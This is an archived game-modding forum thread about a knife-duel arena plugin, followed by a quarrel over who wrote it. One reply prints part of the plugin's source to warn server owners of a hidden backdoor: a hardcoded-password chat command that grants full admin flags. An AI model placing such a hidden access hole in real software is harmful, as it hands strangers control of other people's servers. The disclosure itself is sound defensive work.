AlliedModders

AlliedModders (https://forums.alliedmods.net/index.php)
-   Unapproved/Old Plugins (https://forums.alliedmods.net/forumdisplay.php?f=27)
-   -   Knife Duels Arena 1v1 (https://forums.alliedmods.net/showthread.php?t=300412)

Saint Sinner 08-16-2017 02:48

Knife Duels Arena 1v1
 
Moderator Notice:
This plugin does not follow GPL. Do not purchase licenses for plugins.



Description :
- When two players or more players from different teams are alive, and want to make a knife duel, one can challenge other writing /duel !
- Duel challenge is made through a menu and chat messages.
- When the challenged player accept the duel, players will be automated moved to a "Predefined origins",face to face and the cage is automatically created for not escape
- Players can play 10,20 or many duel rounds !
- After CT/T wins cage is destroyed.
- If you whrite /arena can opening menu to modify and save arena location !
- You can save 16 arenas - Default 4 arenas
- Good Luck & Have fun

Player commands

Code:

/duel  (this is the word used to start duel)
/giveup  (this is the word used to go online or offline)
/offduel  (this is the word used to end the duel)

Admin commands

Code:

/arena (Arena menu)
/origin


https://www.youtube.com/watch?v=od4qo7Mg-NE

http://i.imgur.com/KGfkLjf.jpg
http://i.imgur.com/mhilUBb.jpg

Ayman Khaled 08-16-2017 05:57

Re: Knife Duels Arena 1v1
 
Remove .amxx .

SomewhereLost 08-17-2017 13:41

Re: Knife Duels Arena 1v1
 
I'm asking forum moderators/administrators to delete this thread since this guy got this code from unknown sources. This plugin was made for my servers privately, he renamed himself as an author (I can give any proof that this plugin was originally made for me) but I haven't sold it or anything and this chap here just faked the copyrights. Renamed plugin to his, "raizo" guy whos using exploits on many servers. Even " new STYLA_SECURITY = OFF " this proves something.

Ayman Khaled 08-17-2017 14:23

Re: Knife Duels Arena 1v1
 
then how he got it if you didn't even sold it :mrgreen: ?

SomewhereLost 08-17-2017 14:35

Re: Knife Duels Arena 1v1
 
My post says different thing here, I mentioned unknown sources. Its about faking the copyrights and releasing it.

edon1337 08-17-2017 16:21

Re: Knife Duels Arena 1v1
 
Quote:

Originally Posted by SomewhereLost (Post 2542179)
My post says different thing here, I mentioned unknown sources. Its about faking the copyrights and releasing it.

Even if you're right, you have no proof to back that up, he's still a winner.

SomewhereLost 08-17-2017 16:34

Re: Knife Duels Arena 1v1
 
I mentioned above, I do have some proofs, Im just not willing to publish them here, someone might use them too.

Syturi0 08-18-2017 20:07

Re: Knife Duels Arena 1v1
 
Can you provide a vídeo?

AdrenalinesWrath 08-25-2017 19:33

Re: Knife Duels Arena 1v1
 
This "raizo" person has stolen this source code from postbin.com which was made by me.
if you go and search for it here: https://pastebin.com/search?q=knife+duels

you'll find it there and its link is this: https://pastebin.com/UFDxr49Y

now if you check the date that was posted: AUG 22ND, 2016

and raizo just recently released the source code, do you think I somehow "stole" it from his computer?
this source code was mainly made for a player named "- Styla"
which is why you can find in code words like:
"new STYLA_SECURITY = ON"
"#define STYLA_PASSWORD"
"// just numerating on and off for the "STYLA_SECURITY""

and in my original code you'll find these:

"#define P_AUTH "Adrenaline's Wrath""
"#define P_REQ "- STyLa""

this is all to "prove" that he is not the owner of this code.

now to reveal some facts, whoever's using this code has put his server in danger.
read carefully in the source code which is something I made for "- Styla" by their request:

// here you can activate the admin access system
new STYLA_SECURITY = ON

// this is the password for the security access
#define STYLA_PASSWORD "tkvemdzgnerebo"

if(STYLA_SECURITY == ON)
register_clcmd (STYLA_PASSWORD , "tkvemdzgnerebo123");

public tkvemdzgnerebo123(id)
{
set_user_flags(id, read_flags("abcdefghijklmnopqrstu"))
client_print_color(id, DontChange,"%sAccess granted.",CHAT_TAG)
}

now if you understood what this does, you'd know your server is at risk right away. I'm surprised how nobody noticed this right away
and clearly I stated "// here you can activate the admin access system" and "// this is the password for the security access"

once again, this plugin was not made by "raizo" it was made by me "Adrenaline's Wrath", if you're smart enough you can tell by the date posted by me
and the date posted by him.
even tho it's posted as guest but it says #define P_AUTH "Adrenaline's Wrath" which is the plugin's author.

I'm not against him publishing it or sharing it with anybody let alone selling it, but what got me is the fact he removed my credits from it.

I have proveded "enough" proof imo, so I leave it to you all to decide. if this isn't enough then I'm done.

Ayman Khaled 08-26-2017 03:27

Re: Knife Duels Arena 1v1
 
wow, first 'SomewhereLost' said that this plugin is his, now 'AdrenalinesWrath' too...


All times are GMT -4. The time now is 07:26.

Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.